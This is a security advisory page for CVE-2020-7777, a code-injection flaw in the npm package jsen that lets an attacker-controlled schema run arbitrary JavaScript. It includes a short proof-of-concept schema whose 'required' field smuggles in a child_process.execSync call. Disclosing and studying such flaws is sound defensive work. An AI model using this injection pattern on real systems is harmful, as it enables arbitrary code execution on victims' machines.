GHSA-vm64-cfqx-3698
Dashboard / Vulnerabilities / GHSA-vm64-cfqx-3698
Summary: Code Injection in jsen
Details: This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so it is assumed that this is applicable. In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a `Function.apply();`, leading to an Arbitrary Code Execution. ### PoC ```js const jsen = require('jsen'); let schema = JSON.parse( { "type": "object", "properties": { "username": { "type": "string" } }, "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""] } ); const validate = jsen(schema); validate({}); ```
References: https://nvd.nist.gov/vuln/detail/CVE-2020-7777, https://github.com/bugventure/jsen/blob/master/lib/jsen.js#L875, https://security.snyk.io/vuln/SNYK-JS-JSEN-1014670
Affected packages
Package
Name: jsen
Purl: pkg:npm/jsen
Affected ranges
Type: SEMVER
Events:
